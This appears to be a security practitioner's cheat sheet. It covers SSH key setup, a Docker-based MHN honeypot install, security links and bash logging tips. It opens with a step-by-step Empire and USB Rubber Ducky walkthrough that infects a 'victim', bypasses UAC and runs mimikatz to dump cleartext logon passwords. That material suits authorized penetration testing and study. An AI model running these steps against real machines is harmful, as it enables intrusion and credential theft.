Empire + Ducky

1. Create listener
1a. (Empire) > listeners
1b. (Empire: listeners) > set Name Listener01
1c. (Empire: listeners) > execute
1d. (Empire: listeners) > back
2. Create ducky payload
2a. (Empire) > agents
2b. (Empire: agents) > usestager ducky
2c. (Empire: stager/ducky) > set listener Listener01
2d. (Empire: stager/ducky) > set Outfile /home/ducky.txt
2e. (Empire: stager/ducky) > generate
3. Put payload onto Ducky
3a. Generate the inject.bin file from the code in ducky.txt at the Duck Toolkit site
3b. Copy inject.bin to Ducky
3c. Inject Ducky on victim
4. Try to extract login passwords from victim
4a. Wait for victim to connect back to Empire
4b. (Empire) > agents
4c. (Empire: agents) > list
4d. (Empire: agents) > interact FSDFSGAJ34FGH4
4e. (Empire: FSDFSGAJ34FGH4) > sysinfo
4f. (Empire: FSDFSGAJ34FGH4) > usemodule privesc/bypassuac
4g. (Empire: privesc/bypassuac) > set Listener Listener01
4h. (Empire: privesc/bypassuac) > run
4i. (Empire: privesc/bypassuac) > back (twice)
4j. (Empire: agents) > list
4k. (Empire: agents) > interact DSGHFDFSGHJ243J
4l. (Empire: DSGHFDFSGHJ243J) > usemodule credentials/mimikatz/logonpasswords
4m. (Empire: credentials/mimikatz/logonpasswords) > run

If successful, logon passwords are now revealed in cleartext :)

SSH Authentication

  • Generate key pair

    • Linux: # ssh-keygen -t rsa
    • PuTTY: puttygen.exe
  • Load the private key in the PuTTY profile

  • Copy the public key to ~/.ssh/authorized_keys

  • Change permissions on folders

    • chmod 700 ~/.ssh
    • chmod 600 ~/.ssh/authorized_keys
  • Change owner on folder

    • chown -R $USER:$USER ~/.ssh
  • Verify that folders aren't group/world writable (with StrictModes on, which is the default, sshd refuses to use authorized_keys when the home directory, ~/.ssh or the file itself is group/world writable, and logs "bad ownership or modes" in the auth log)

    • chmod go-w $HOME $HOME/.ssh $HOME/.ssh/authorized_keys
  • Edit sshd_config

    • # nano /etc/ssh/sshd_config
    • Make sure that a line says 'AuthorizedKeysFile %h/.ssh/authorized_keys'
  • Restart SSH

    • # service ssh restart
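The ownership and permission checks from the list above, as an added shell example that is not part of the original notes: the home directory is passed as an argument so it can be run against any account or a scratch directory, and "fix" as the second argument applies the chown/chmod steps. The function name check_ssh_perms and the argument layout are assumptions for this example.

```shell
#!/bin/sh
# Added example: audit (and optionally repair) the ownership and modes that
# sshd checks under StrictModes before it will use ~/.ssh/authorized_keys.
# Usage: check_ssh_perms HOME_DIR [check|fix]   (names are assumptions)

check_ssh_perms() {
    home_dir="$1"
    mode="${2:-check}"
    ssh_dir="$home_dir/.ssh"
    auth_keys="$ssh_dir/authorized_keys"
    owner="$(id -un)"
    problems=0

    for path in "$home_dir" "$ssh_dir" "$auth_keys"; do
        if [ ! -e "$path" ]; then
            echo "missing: $path"
            problems=$((problems + 1))
            continue
        fi
        # -prune keeps find on the path itself instead of descending;
        # -perm -020 / -002 match the group- and world-write bits (POSIX find).
        if [ -n "$(find "$path" -prune \( -perm -020 -o -perm -002 \) -print)" ]; then
            echo "group/world writable: $path"
            problems=$((problems + 1))
        fi
        if [ -n "$(find "$path" -prune ! -user "$owner" -print)" ]; then
            echo "not owned by $owner: $path"
            problems=$((problems + 1))
        fi
    done

    if [ "$mode" = "fix" ] && [ "$problems" -gt 0 ]; then
        # Same steps as the list above: take ownership of ~/.ssh, tighten modes.
        if [ -d "$ssh_dir" ]; then
            chown -R "$owner" "$ssh_dir"
            chmod 700 "$ssh_dir"
        fi
        if [ -e "$auth_keys" ]; then chmod 600 "$auth_keys"; fi
        chmod go-w "$home_dir"
        echo "repaired; run again with 'check' to verify"
    fi

    # exit status 0 only when nothing was flagged
    [ "$problems" -eq 0 ]
}

# Stand-alone use: ./check_ssh_perms.sh /home/alice [check|fix]
if [ $# -gt 0 ]; then check_ssh_perms "$1" "${2:-check}"; fi
```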

Docker & MHN

Install docker

# apt-get install docker.io

Create & run Docker container for MHN

# docker run -p 10000:10000 -p 80:80 -p 3000:3000 -p 8089:8089 -p 8091:8091 --name mhnsrv --hostname=mhnsrv -t -i ubuntu:14.04 /bin/bash

Install & configure MHN server

#!/bin/bash

set -x

apt-get update 
apt-get upgrade -y 
apt-get install git wget gcc supervisor -y 
cd /opt/ 
git clone https://github.com/threatstream/mhn.git 
cd mhn

cat > /etc/supervisor/conf.d/mhntodocker.conf <<EOF
[program:mongod]
command=/usr/bin/mongod
stdout_logfile=/var/log/supervisor/%(program_name)s.log
stderr_logfile=/var/log/supervisor/%(program_name)s.log
autorestart=true
autostart=true

[program:nginx]
command=/usr/sbin/nginx
stdout_events_enabled=true
stderr_events_enabled=true
autostart=true
autorestart=true

EOF

mkdir -p /data/db /var/log/mhn /var/log/supervisor

supervisord &

# Start mongod through supervisor once install_mongo.sh has installed it
echo supervisorctl start mongod >> /opt/mhn/scripts/install_mongo.sh

./install.sh

supervisorctl restart all 

MHN Configuration

Do you wish to run in Debug mode?: y/n n
Superuser email: fname.lname@mail.com
Superuser password:
Superuser password: (again):
Server base url ["http://1.2.3.4"]: 127.0.0.1
Honeymap url ["127.0.0.1:3000"]:
Mail server address ["localhost"]:
Mail server port [25]:
Use TLS for email?: y/n n
Use SSL for email?: y/n n
Mail server username [""]:
Mail server password [""]:
Mail default sender [""]:
Path for log file ["/var/log/mhn/mhn.log"]:

Create & run a MHN sensor docker container

Container w/ all ports published

# docker run --publish-all=true --name mhnsensor --hostname=mhnsensor -t -i ubuntu:14.04.02 /bin/bash

Container w/ specific ports published

# docker run -p 21:21 -p 2222:22 -p 23:23 -p 25:25 -p 8080:80 -p 110:110 -p 135:135 -p 139:139 -p 443:443 -p 445:445 -p 1433:1433 -p 3306:3306 -p 3389:3389 -p 5060:5060 -p 5061:5061 -p 5900:5900 -p 8081:8081 --name mhnsensor --hostname=mhnsensor -t -i ubuntu:14.04 /bin/bash

Install additional apps

# apt install wget python

Commands

# docker ps : show docker processes

# docker logs [container_id]: show docker logs

# docker inspect [container_id]: show docker details

# docker stats [container_id]: show docker stats

# docker port [container_id]: show docker port

# docker attach mhn : interact with mhn docker container

CTRL-p CTRL-q : detach from container & leave it running

# docker start [container_id] : start a container

# docker exec [container_id] supervisord & : run supervisord inside the mhn server container (the container must already be running, e.g. after docker start).

More info

Docker User guides

https://docs.docker.com/engine/userguide/

Security Links

Average Security Guys
http://averagesecurityguy.info/

Secure Planet

https://www.securepla.net/

http://www.securepla.net/wiki/index.php?title=Main_Page

MDSec.net

http://mdsec.net/wahh/tasks.html

DaftHack

http://www.dafthack.com/blog

CHRISTOPHER TRUNCER’S WEBSITE

https://www.christophertruncer.com/

LockBoxx

http://lockboxx.blogspot.se/

Kioptrix

http://www.kioptrix.com/

www.Ehacking.net (collection)

https://flipboard.com/@dimovey/ethical-hacking-oeci7t8uz


Linux tips :: Various

Custom prompt

$ export PS1='[\d \t \u@\h:\w]$'

Logging #1

Use PuTTY to log commands. Can be handy for documentation.

  • Change Settings... -> Session -> Logging
    • Session logging -> Printable output

PuTTY Reconfiguration

Logging #2

Turn on continuous logging (create the log directory first with mkdir -p ~/.logs, otherwise the redirect fails on every prompt)

export PROMPT_COMMAND='if [ "$(id -u)" -ne 0 ]; then echo "$(date "+%Y-%m-%d.%H:%M:%S") $(pwd) $(history 1)" >> ~/.logs/bash-history-$(date "+%Y-%m-%d").log; fi'


Then finding a specific command or text string is as easy as

# grep -h nmap ~/.logs/bash-history-2016-06*
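An added example, not part of the original notes, that goes one step beyond the grep: it parses the lines written by the PROMPT_COMMAND hook above (timestamp, working directory, history number, command) into per-command counts, a per-directory listing and a time window, which is what you want when reviewing what was run on a box. The function names and the sample log in write_sample_log are constructed for this demo.

```shell
#!/bin/sh
# Added example (not from the original notes): parse the bash-history logs
# written by the PROMPT_COMMAND hook above. Each line looks like
#   2016-06-01.09:12:03 /root/scans  201  nmap -sV 10.0.0.5
# i.e. timestamp, working directory, history number, then the command.
# Function names and the sample log are assumptions constructed for the demo.

write_sample_log() {
    # Constructed sample lines in the hook's format; $1 is the output file.
    cat > "$1" <<'EOF'
2016-06-01.09:12:03 /root/scans  201  nmap -sV 10.0.0.5
2016-06-01.09:15:40 /root/scans  202  nmap -p- 10.0.0.5
2016-06-01.09:20:11 /root  203  ls -la
2016-06-01.09:21:00 /root/scans  204  nmap -sC 10.0.0.5
2016-06-01.09:25:30 /root  205  cd scans
EOF
}

commands_by_name() {
    # "count name" pairs, most frequent first: which tools were run ($@ = log files).
    # Fields: 1 timestamp, 2 pwd, 3 history number, 4 command name.
    awk '{ count[$4]++ } END { for (c in count) print count[c], c }' "$@" | sort -rn
}

commands_in_dir() {
    # Full command text of everything run from directory $1 ($2.. = log files).
    dir="$1"; shift
    awk -v d="$dir" '$2 == d { $1 = $2 = $3 = ""; sub(/^ +/, ""); print }' "$@"
}

commands_between() {
    # Lines whose timestamp falls in [$1, $2]. The hook's YYYY-MM-DD.HH:MM:SS
    # format sorts lexicographically, so a string comparison is enough
    # (the "" concatenation forces awk to compare as strings).
    start="$1"; end="$2"; shift 2
    awk -v s="$start" -v e="$end" '($1 "") >= (s "") && ($1 "") <= (e "")' "$@"
}
```

Point the functions at the real files, e.g. commands_by_name ~/.logs/bash-history-2016-06*, once the hook has been running.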